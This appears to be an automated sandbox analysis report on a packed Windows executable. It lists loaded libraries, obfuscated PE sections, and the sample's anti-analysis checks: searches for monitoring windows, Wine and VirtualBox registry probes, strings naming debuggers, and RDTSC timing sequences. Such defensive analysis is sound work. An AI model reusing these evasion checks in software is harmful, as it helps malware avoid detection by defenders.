Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: winrnr.dllJump to behavior
Source: WP6s7cCLzr.exeStatic file information: File size 4423680 > 1048576
Source: WP6s7cCLzr.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: WP6s7cCLzr.exeStatic PE information: Raw size of ctknaohd is bigger than: 0x100000 < 0x1af600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeUnpacked PE file: 0.2.WP6s7cCLzr.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ctknaohd:EW;tteedpjp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ctknaohd:EW;tteedpjp:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: WP6s7cCLzr.exeStatic PE information: real checksum: 0x447941 should be: 0x43c563
Source: WP6s7cCLzr.exeStatic PE information: section name:
Source: WP6s7cCLzr.exeStatic PE information: section name: .idata
Source: WP6s7cCLzr.exeStatic PE information: section name:
Source: WP6s7cCLzr.exeStatic PE information: section name: ctknaohd
Source: WP6s7cCLzr.exeStatic PE information: section name: tteedpjp
Source: WP6s7cCLzr.exeStatic PE information: section name: .taggant
Source: WP6s7cCLzr.exeStatic PE information: section name: ctknaohd entropy: 7.955071050221465

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BC25F second address: 12BC283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007F474CE39607h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BC3D2 second address: 12BC3DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F474D527166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BC537 second address: 12BC540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BF98D second address: 12BF995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BF995 second address: 12BF999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BF9DA second address: 12BFA1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F474D527168h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sbb dl, 0000002Ch 0x00000029 push 00000000h 0x0000002b adc edx, 26746B32h 0x00000031 push A4EB91F4h 0x00000036 push edi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFA1E second address: 12BFAA4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F474CE395F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b add dword ptr [esp], 5B146E8Ch 0x00000012 xor dword ptr [ebp+12A2376Dh], ecx 0x00000018 push 00000003h 0x0000001a sub edi, 5B72356Dh 0x00000020 push 00000000h 0x00000022 push 00000003h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F474CE395F8h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e pushad 0x0000003f movsx edi, dx 0x00000042 sub dword ptr [ebp+12A237A4h], ecx 0x00000048 popad 0x00000049 call 00007F474CE395F9h 0x0000004e jmp 00007F474CE39603h 0x00000053 push eax 0x00000054 jmp 00007F474CE395FFh 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 jg 00007F474CE395F6h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFAA4 second address: 12BFAF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F474D527171h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F474D527179h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F474D527179h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFAF7 second address: 12BFAFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFAFB second address: 12BFB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 lea ebx, dword ptr [ebp+12B978BFh] 0x0000000e mov dword ptr [ebp+12A2239Ah], ecx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFB16 second address: 12BFB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFB1A second address: 12BFB24 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F474D527166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFB4C second address: 12BFB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFB52 second address: 12BFB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F474D527177h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dl, ah 0x00000010 push 00000000h 0x00000012 stc 0x00000013 call 00007F474D527169h 0x00000018 push edi 0x00000019 push esi 0x0000001a push edx 0x0000001b pop edx 0x0000001c pop esi 0x0000001d pop edi 0x0000001e push eax 0x0000001f jl 00007F474D52717Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F474D52716Ah 0x0000002c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFB99 second address: 12BFB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFC7F second address: 12BFD02 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F474D527168h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F474D52716Ch 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push esi 0x00000018 push ebx 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop ebx 0x0000001c pop esi 0x0000001d pop eax 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F474D527168h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 jmp 00007F474D52716Eh 0x0000003d mov edi, dword ptr [ebp+12A2239Ah] 0x00000043 lea ebx, dword ptr [ebp+12B978C8h] 0x00000049 jmp 00007F474D52716Dh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 js 00007F474D527172h 0x00000057 jmp 00007F474D52716Ch 0x0000005c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFE1F second address: 12BFE29 instructions: 0x00000000 rdtsc 0x00000002 je 00007F474CE395F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12BFE29 second address: 12BFE5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007F474D527166h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 034988FAh 0x00000015 sub dword ptr [ebp+12A22169h], ecx 0x0000001b mov si, bx 0x0000001e lea ebx, dword ptr [ebp+12B978D3h] 0x00000024 stc 0x00000025 mov dh, bl 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b jnp 00007F474D527166h 0x00000031 pop edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12AB0EF second address: 12AB11E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F474CE395F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F474CE39603h 0x00000011 jmp 00007F474CE39600h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12AB11E second address: 12AB168 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F474D527166h 0x00000008 jmp 00007F474D52716Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007F474D527179h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F474D527176h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12AB168 second address: 12AB16E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12AB16E second address: 12AB174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DE1DB second address: 12DE1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DE1DF second address: 12DE1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jng 00007F474D527166h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DE453 second address: 12DE457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DE5D0 second address: 12DE5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474D52716Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DE5E3 second address: 12DE5ED instructions: 0x00000000 rdtsc 0x00000002 js 00007F474CE395F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DE5ED second address: 12DE639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F474D527173h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jl 00007F474D527168h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 jo 00007F474D527166h 0x0000001d jmp 00007F474D527170h 0x00000022 pop eax 0x00000023 push esi 0x00000024 push edi 0x00000025 pop edi 0x00000026 pushad 0x00000027 popad 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b ja 00007F474D527166h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DE639 second address: 12DE63D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DEAA9 second address: 12DEAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12D4B0E second address: 12D4B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jnc 00007F474CE395F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12B1D52 second address: 12B1D58 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12B1D58 second address: 12B1D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12B1D62 second address: 12B1D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12B1D68 second address: 12B1D77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE395FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DEE96 second address: 12DEEB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527174h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F474D527166h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DEEB6 second address: 12DEEBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DEEBA second address: 12DEEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DF4A6 second address: 12DF4AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DF4AA second address: 12DF4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F474D527166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DF4B9 second address: 12DF4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12DF4BE second address: 12DF4C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12E6856 second address: 12E685A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12E5A07 second address: 12E5A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12E6A78 second address: 12E6A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12E6A7D second address: 12E6A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12E6A83 second address: 12E6A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12E6A87 second address: 12E6AD7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F474D527166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F474D527172h 0x00000013 jl 00007F474D52716Ch 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F474D527175h 0x00000022 mov eax, dword ptr [eax] 0x00000024 push esi 0x00000025 jo 00007F474D52716Ch 0x0000002b js 00007F474D527166h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 pushad 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
